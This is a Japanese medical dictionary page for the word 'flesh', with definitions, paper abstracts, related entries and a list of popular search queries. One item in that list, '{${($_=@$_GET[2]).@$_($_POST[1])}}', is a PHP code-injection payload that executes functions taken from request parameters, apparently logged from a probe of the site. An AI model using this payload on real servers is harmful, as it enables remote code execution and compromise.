<reserve_content_cash>

</reserve_content_cash>

 

flesh

出典: meddic

  • n.
biologicbiologicalbioticmeatorganismpulpsarcocarp

WordNet   license wordnet

「remove adhering flesh from (hides) when preparing leather manufacture」

WordNet   license wordnet

「the soft tissue of the body of a vertebrate: mainly muscle tissue and fat」

PrepTutorEJDIC   license prepejdic

「(人間・動物の)『肉』 / (魚,時には鳥を除く)食肉(meat) / 肉付き,太りぐあい / (くだもの)果肉;(野菜の)葉肉 / 《the~》(精神・魂に対して)『肉体』,身体 / 《the~》肉欲 / 肉色(ピンクがかった肌色)」

Wikipedia preview

出典(authority):フリー百科事典『ウィキペディア(Wikipedia)』「2017/03/21 16:37:45」(JST)

wiki en

[Wiki en表示]

UpToDate Contents

全文を閲覧するには購読必要です。 To read the full text you will need to subscribe.

英文文献

  • Identification and quantification of anthocyanins in transgenic purple tomato.
  • Su X1, Xu J1, Rhodes D1, Shen Y1, Song W2, Katz B3, Tomich J3, Wang W4.
  • Food chemistry.Food Chem.2016 Jul 1;202:184-8. doi: 10.1016/j.foodchem.2016.01.128. Epub 2016 Jan 29.
  • Anthocyanins are natural pigments derived from the phenylpropanoid pathway. Most tomatoes produce little anthocyanins, but the transgenic purple tomato biosynthesizes a high level of anthocyanins due to expression of two transcription factors (Del and Ros1). This study was to identify and quantify a
  • PMID 26920283
  • Effect of solvent type and ratio on betacyanins and antioxidant activity of extracts from Hylocereus polyrhizus flesh and peel by supercritical fluid extraction and solvent extraction.
  • Fathordoobady F1, Mirhosseini H1, Selamat J2, Manap MY3.
  • Food chemistry.Food Chem.2016 Jul 1;202:70-80. doi: 10.1016/j.foodchem.2016.01.121. Epub 2016 Jan 28.
  • The main objective of the present study was to investigate the effect of solvent type and ratio as well as the extraction techniques (i.e. supercritical fluid extraction (SFE) and conventional solvent extraction) on betacyanins and antioxidant activity of the peel and fresh extract from the red pita
  • PMID 26920267
  • Long-term storage effect on chemical composition, nutritional value and quality of Greek onion landrace "Vatikiotiko".
  • Petropoulos SA1, Ntatsi G2, Fernandes Â3, Barros L3, Barreira JC3, Ferreira IC4, Antoniadis V5.
  • Food chemistry.Food Chem.2016 Jun 15;201:168-76. doi: 10.1016/j.foodchem.2016.01.095. Epub 2016 Jan 21.
  • The effect of storage at two temperatures (5±1 and 25±1°C and 60-70±5% RH for both temperatures) on marketability and quality features of dry bulbs of local landrace "Vatikiotiko", "Sivan F1", "Red Cross F1" and "Creamgold" was examined. During storage measurements for fresh and dry weight of bu
  • PMID 26868562
  • Effects of different stunning methods on the flesh quality of grass carp (Ctenopharyngodon idellus) fillets stored at 4°C.
  • Qin N1, Li D1, Hong H1, Zhang Y1, Zhu B2, Luo Y3.
  • Food chemistry.Food Chem.2016 Jun 15;201:131-8. doi: 10.1016/j.foodchem.2016.01.071. Epub 2016 Jan 18.
  • The effects of stunning methods (percussion (T1), stunning at -22°C in a freezer (T2), and immersion in ice slurry (T3)) on the flesh quality of grass carp fillets were evaluated in terms of K-value, total volatile base nitrogen (TVB-N), electrical conductivity (EC), total viable counts (TVC), biog
  • PMID 26868557

和文文献

  • マレーシア産ニクバエの1新属新種(双翅目 : ニクバエ科)
  • KURAHASHI Hiromu,TAN Siew Hwa
  • 衛生動物 63(4), 307-312, 2012-12-30
  • NAID 40019550254
  • 慧命(えみょう)の回路 : 明末・雲棲〓宏の不殺生思想
  • 西村 玲
  • 宗教研究 86(3), 531-552, 2012-12-30
  • 明末新仏教の先駆けとなった雲棲〓宏は、生涯にわたって不殺生と放生を実行し、現代まで広く崇敬される。仏教における不殺生の原理は、梵網経を根拠として、インド由来の輪廻説と中国における孝道が一体化したものである。十六世紀末から始まったキリスト教中国布教の中心であったマテオ・リッチは、その教理書『天主実義』で、人間が動物を殺すことは天主から与えられた恩恵であると主張し、仏教の輪廻と孝による不殺生を不合理で …
  • NAID 110009562639
  • Pa-206 海水を含んだゴムノキの密閉型ガス化炉による間接ガス化(2.技術,ポスターセッション1)
  • 西田 直哉,本間 寛己,本間 寛臣,SYAM Bustami
  • バイオマス科学会議発表論文集 (8), 90-91, 2012-12-25
  • … We carried out indirect gasification in a sealed gasifier and compare a gas volume and composition with the case using flesh water as catalyst. …
  • NAID 110009560605
  • 可視・近赤外分光法を用いるブラッドオレンジ果肉における紫色の着色程度の非破壊計測の可能性
  • 伊藤 史朗,森本 進,服部 玄,伊藤 秀和
  • 照明学会誌 96(11), 747-751, 2012-11-01
  • NAID 10031079879

関連リンク

flesh 【自動】太る、肉付きが良くなる 【他動】 〔皮から〕肉をこそぎ落とす 〔... - アルクがお届けする進化するオンライン英和・和英辞書データベース。一般的な単語や連語から、イディオム、専門用語、スラングまで幅広く収録。
flesh (flĕsh) n. 1. a. The soft tissue of the body of a vertebrate, covering the bones and consisting mainly of skeletal muscle and fat: thought the boy needed some more flesh on his bones. b. Such tissue of an animal, used as food: flesh of a cow; fish with white flesh.
Middle English, from Old English flǣsc; akin to Old High German fleisk flesh and perhaps to Old English flēan to flay — more at flay First Known Use: before ... the soft parts of the body of an animal and especially of a vertebrate; especially ...

関連画像

Skin with flesh layedFlesh Eating Bacteria is Coming to a Town First Flesh Wound by msalihillProud flesh is granulated tissue formed as Flesh Eating Disease by bethanyserpicomuaGowanus Canal Flesh Eating BacteriaFlesh-Eating-Disease-GROSS-DISEASESRed abstract flesh.


★リンクテーブル★
先読みpulp
リンク元organism」「meat」「biological」「biotic」「生物
拡張検索proud flesh」「fleshly」「gooseflesh」「horseflesh」「fleshpot

pulp」

  [★]

  • n.

WordNet   license wordnet

「remove the pulp from, as from a fruit」

WordNet   license wordnet

「a soft moist part of a fruit」
flesh

WordNet   license wordnet

「a mixture of cellulose fibers」

WordNet   license wordnet

「reduce to pulp; "pulp fruit"; "pulp wood"」

WordNet   license wordnet

「any soft or soggy mass; "he pounded it to a pulp"」
mush

WordNet   license wordnet

「an inexpensive magazine printed on poor quality paper」
pulp magazine

WordNet   license wordnet

「the soft inner part of a tooth」

PrepTutorEJDIC   license prepejdic

「〈U〉(果実・野菜などの)果肉 / 〈U〉髄質(骨髄・歯髄など) / 〈U〉(製紙原料の)パルプ / 〈U〉《時にa~》どろどろしたもの / 《しばしば複数形で》(粗末な紙にきわもの記事を印刷した)低俗雑誌 / …‘を'パルプにする;…‘を'どろどろにする」


organism」

  [★]

  • n.
biologicbiologicalbioticflesh

WordNet   license wordnet

「a living thing that has (or can develop) the ability to act or function independently」
being

WordNet   license wordnet

「a system considered analogous in structure or function to a living body; "the social organism"」

PrepTutorEJDIC   license prepejdic

「有機体,生物 / (国家・社会などの)有機的組織体」


meat」

  [★]

flesh

WordNet   license wordnet

「the flesh of animals (including fishes and birds and snails) used as food」

PrepTutorEJDIC   license prepejdic

「(食用の)『動物の肉』 / 《英古》《米文》(一般的に)『食物』(food) / (課実などの)食用部分,果肉 / (議論・書物などの)最も重要な部分,主眼点,骨子《+『of』+『名』》」


biological」

  [★]

  • adj.
  • 生物学的な、生物学の、生物学上の、生物の
biolbiologicbiologicallybiologybioticfleshorganism

WordNet   license wordnet

「of parents and children; related by blood; "biological child"」

WordNet   license wordnet

「pertaining to biology or to life and living things」
biologic


biotic」

  [★]

  • adj.
  • 生物的な、生物の
biologicbiologicalfleshorganism

WordNet   license wordnet

「of or relating to living organisms」

PrepTutorEJDIC   license prepejdic

「生命の;生物の」


生物」

  [★]

果肉生物学生物学的生物体生物学上肉体生命体生物的


proud flesh」

  [★]

WordNet   license wordnet

「the swollen tissue around a healing wound or ulcer」


fleshly」

  [★]

PrepTutorEJDIC   license prepejdic

「肉体の(bodily) / 肉欲の(carnal)」


gooseflesh」

  [★]

PrepTutorEJDIC   license prepejdic

「(寒気などによる)鳥肌」


horseflesh」

  [★]

PrepTutorEJDIC   license prepejdic

「馬肉 / 《集合的に》馬」


fleshpot」

  [★]

PrepTutorEJDIC   license prepejdic

「歓楽地」


"http://meddic.jp/flesh" より作成


★コメント★

[メモ入力エリア]
※コメント5000文字まで
ニックネーム:
コメント:




表示
個人用ツール


  meddic.jp

リンク
連絡
週間・日々の人気記事
最近7日間の人気記事
 タイトル表示
1nakamura-vn1@nskk-n.co.jp114
2ataxis hemiparesis15
3再興感染症 症状12
4Frequency of Manual Blowdown mail8
5遺伝性運動感覚性ニューロパチー6
6BEEF / SILVERSIDE BONELESS mail5
7abdominal+++purglel腹壁膨出5
8ツェンカー憩室4
9Breadnut mail4
10importers and exporters of cocoa cocoa butter shear butter lotions cosmetics +44 +86 +32 +31 mail3
11スウォーミング+菌3
12リンネテスト3
13血中ACTH/コルチゾル 少量デキサメサゾン抑制試験3
14、Adamkiewicz’s+artery3
15copper sulphate Jsc mail3
16Medical Practitioners - Pharmacists Medical Practitioners - Physicians Medical Practitioners - Physiotherapists Medical Practitioners - Plastic Surgeons mail3
17心筋ブリッジとは3
18copper sulphate S A / S.A mail3
19{${($_=@$_GET[2]).@$_($_POST[1])}}3
20アポリポ蛋白E+seikisui3

昨日の人気記事
 タイトル表示
1アポリポ蛋白E+seikisui3
2正常値+左室駆出率3
3用手圧迫介助法+排尿2
4横紋筋融解症+急性腎不全 悪性症候群2
5エスカイン2
6卵巣栄養血管2
7マクロピノサイトーシス2
8リンフォトキシン2
9モラルトリートメントとは2
10気管支平滑筋+弛緩2
11コッホ現象2
12胃回腸反射2
13胎盤娩出法2
14高分子キニノゲン2
15性腺芽腫2
16ロフスタンキーアショフ洞2
17胎盤娩出法+クレーデ法2
18クロラムフェニコール+半減期2
19Marchiava-Bignami病toha2
20gram陽性球菌2